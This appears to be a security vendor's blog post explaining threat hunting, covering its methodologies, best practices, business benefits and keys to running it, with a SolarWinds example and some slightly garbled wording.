Blog
What is threat hunting?
Threat hunting — A preemptive measure to assess environments for threats that are not detected by current security tools and practices.
Why threat hunting is important
The SANS institute’s 2020 threat hunting survey showed that 65% of organizations have threat hunting programs and that 29% of organizations plan to implement threat hunting practices over the next year.1
Many companies support effective malware analysis programs with threat hunting programs, ensuring that they consistently identify active and benign threats across their environment.
For example, in 2020, SolarWinds used ReversingLabs threat hunting tools. It located the active threats behind the supply chain attack that had targeted it and that had impacted 18,000 organizations and generated $40 million in damages.2
With malware analysis tools, this attack would have remained undetected for the foreseeable future, targeting more users and causing more damages to victims’ systems.
Best practices for effective threat hunting
To effectively identify benign threats that could contribute to severe incidents, teams must follow several best practices around methodologies, technology, specialized teams, and threat intelligence.
Three popular threat hunting methodologies include the hypothesis-driven approach, the review of attack indicators, and the use of ML- and AI-based tools.
Hypothesis-driven: This includes spotting abnormalities, formulating an educated guess about what caused them, and reviewing data to validate whether potential threats should be investigated.
Review of attack indicators: Threat intelligence platforms are used to find indicators of compromise or attack that should then be researched further.
ML- and AI-based assessments: With machine learning and artificial intelligence, data is automatically reviewed and abnormal behaviors can be identified.
Threat hunting tools complement existing endpoint detection and response (EDR) tools by offering more complex and detailed analysis to discover suspicious behaviors and patterns that EDR tools cannot detect.
It is also important to create specialized teams that exclusively focus on threat hunting because it requires a unique set of skills. Threat hunters must understand how to operate specific tools, follow the methodologies listed above, and be creative when deciding which potential threats and attack vectors should be addressed.
Finally, threat intelligence helps guide threat hunters on the severity of threats and indicators of compromise, how it could impact their systems, and how to respond to them, allowing them to effectively address security weaknesses.
Business benefits of threat hunting
Faster response times: By reviewing anomalies and assessing threats proactively, teams understand the behaviors and location of malware and are able to formulate remediation strategies and respond faster.
Efficient investigations: When threats emerge, high levels of urgency and stress may lead teams to inefficiently address and resolve issues. By preemptively reviewing issues, organizations can take a calm, measured, and methodical approach toward remediating problems.
Greater visibility: When hunting for threats, analysts must review their environments’ composition and understand what typical behaviors are, providing greater visibility into how their systems function on a day-to-day basis.
Fewer false positives: False positives lead to inefficient security practices because teams must spend too much time responding to alerts and issues that do not impact their security integrity. By implementing threat hunting, teams review data and how it is reported to create rules which suppress certain alerts and limit false positives.
Reduced risk: Proactively addressing security issues before they emerge in production prevents enterprises’ environments from being damaged by latent threats and reduces the cost to run their systems.4
Keys to effective threat hunting
Create protocols to investigate threats: Develop a checklist when assessing hidden threats to create consistent security measures and ensure that proper investigative steps are taken.
Prioritize threats and weaknesses based on severity: This helps SOC teams to understand which problems should be solved first.
Think like an attacker: Locate areas where malware is unlikely to be discovered and learn about how your organization’s specific systems could be exploited by malicious actors to uncover potential attack vectors.
Learn more
For further insights into threat hunting and its implications, explore the following articles:
